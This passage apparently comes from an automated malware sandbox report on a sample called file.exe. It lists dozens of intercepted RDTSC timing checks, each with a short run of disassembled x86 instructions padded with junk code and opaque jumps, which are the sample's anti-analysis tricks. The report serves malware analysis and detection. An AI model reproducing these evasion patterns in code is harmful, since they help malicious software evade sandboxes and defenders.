[ebp+1244E018h] 0x00000069 sub dword ptr [ebp+122D1D7Bh], ecx 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jnp 00007F98450EE8D7h 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC450 second address: 13DC457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EDD0F second address: 13EDD15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC6BA second address: 13FC6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D210C second address: 13D2124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F98450EE8D2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FA76F second address: 13FA78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jne 00007F9844BC1D56h 0x0000000c jnp 00007F9844BC1D56h 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F9844BC1D56h 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FAC17 second address: 13FAC1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FAF20 second address: 13FAF44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9844BC1D56h 0x0000000a jmp 00007F9844BC1D5Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F9844BC1D56h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FAF44 second address: 13FAF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FAF48 second address: 13FAF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FAF4E second address: 13FAF5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 ja 00007F98450EE8C6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FAF5E second address: 13FAF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9844BC1D60h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB508 second address: 13FB50C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB50C second address: 13FB512 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB512 second address: 13FB51A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB51A second address: 13FB51E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB51E second address: 13FB538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8CEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB691 second address: 13FB6A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Bh 0x00000007 jo 00007F9844BC1D5Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F0D94 second address: 13F0D9E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F0D9E second address: 13F0DD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F9844BC1D66h 0x00000013 ja 00007F9844BC1D56h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D068F second address: 13D0695 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D0695 second address: 13D069B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D069B second address: 13D06A0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FBDBB second address: 13FBDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9844BC1D67h 0x0000000c jg 00007F9844BC1D56h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FBDDF second address: 13FBE07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98450EE8CAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FBF40 second address: 13FBF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FBF48 second address: 13FBF5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F98450EE8CCh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FBF5C second address: 13FBF76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F9844BC1D5Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC0E6 second address: 13FC0F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F98450EE8C6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC0F2 second address: 13FC0F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC536 second address: 13FC53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC53A second address: 13FC555 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9844BC1D5Bh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC555 second address: 13FC569 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC569 second address: 13FC56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC56F second address: 13FC575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC575 second address: 13FC57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC57B second address: 13FC57F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDC91 second address: 13FDCCA instructions: 0x00000000 rdtsc 0x00000002 js 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F9844BC1D63h 0x0000000f jmp 00007F9844BC1D64h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDCCA second address: 13FDCE1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F98450EE8CAh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDCE1 second address: 13FDCF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F9844BC1D56h 0x0000000d jl 00007F9844BC1D56h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDCF4 second address: 13FDCFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14001C2 second address: 14001D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F9844BC1D5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14001D5 second address: 14001D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14001D9 second address: 1400206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F9844BC1D5Fh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1400206 second address: 140020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140020A second address: 140020E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140020E second address: 1400214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FEAA8 second address: 13FEAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FF1D2 second address: 13FF1D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14002B3 second address: 14002B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14002B9 second address: 14002BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14002BF second address: 14002C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14002C3 second address: 14002DF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F98450EE8CDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14002DF second address: 1400307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F9844BC1D63h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1400307 second address: 140032F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F98450EE8CCh 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14097E2 second address: 14097E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1409AE9 second address: 1409AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B0A5 second address: 140B0AF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B0AF second address: 140B0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B0B5 second address: 140B0CF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jbe 00007F9844BC1D64h 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B0CF second address: 140B0D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B0D3 second address: 140B139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F9844BC1D68h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jmp 00007F9844BC1D5Bh 0x00000016 pop eax 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F9844BC1D58h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 call 00007F9844BC1D59h 0x00000036 jc 00007F9844BC1D64h 0x0000003c pushad 0x0000003d jbe 00007F9844BC1D56h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B139 second address: 140B145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B145 second address: 140B184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F9844BC1D63h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F9844BC1D68h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B47D second address: 140B481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B481 second address: 140B485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B836 second address: 140B83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B83A second address: 140B843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BEFD second address: 140BF16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8D4h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C0F5 second address: 140C0FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C0FB second address: 140C0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C0FF second address: 140C126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d js 00007F9844BC1D5Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C185 second address: 140C18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140DD39 second address: 140DDC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9844BC1D5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov di, cx 0x00000010 push 00000000h 0x00000012 add dword ptr [ebp+122D2A02h], ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F9844BC1D58h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 call 00007F9844BC1D5Eh 0x00000039 jmp 00007F9844BC1D68h 0x0000003e pop edi 0x0000003f xchg eax, ebx 0x00000040 jmp 00007F9844BC1D67h 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E6C4 second address: 140E6DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E6DF second address: 140E6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E6E3 second address: 140E6E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E6E9 second address: 140E75B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F9844BC1D58h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jmp 00007F9844BC1D62h 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D2251h], esi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F9844BC1D58h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push esi 0x00000052 pop esi 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14103B3 second address: 14103B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14103B7 second address: 14103BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14103BB second address: 141042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F98450EE8CFh 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F98450EE8D9h 0x00000016 nop 0x00000017 pushad 0x00000018 mov bx, cx 0x0000001b mov eax, esi 0x0000001d popad 0x0000001e push 00000000h 0x00000020 mov edi, dword ptr [ebp+122D1D01h] 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F98450EE8C8h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 cmc 0x00000043 mov dword ptr [ebp+122D1D71h], edx 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c jp 00007F98450EE8C8h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1410E28 second address: 1410E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14122E1 second address: 14122E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14122E7 second address: 14122EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14122EC second address: 1412369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F98450EE8C8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F98450EE8C8h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D2191h], esi 0x00000049 add dword ptr [ebp+122D1BB2h], edx 0x0000004f xchg eax, ebx 0x00000050 push ecx 0x00000051 jmp 00007F98450EE8CEh 0x00000056 pop ecx 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F98450EE8CEh 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1412369 second address: 1412373 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9844BC1D5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1412E37 second address: 1412E4E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F98450EE8C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jns 00007F98450EE8C6h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1412E4E second address: 1412E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
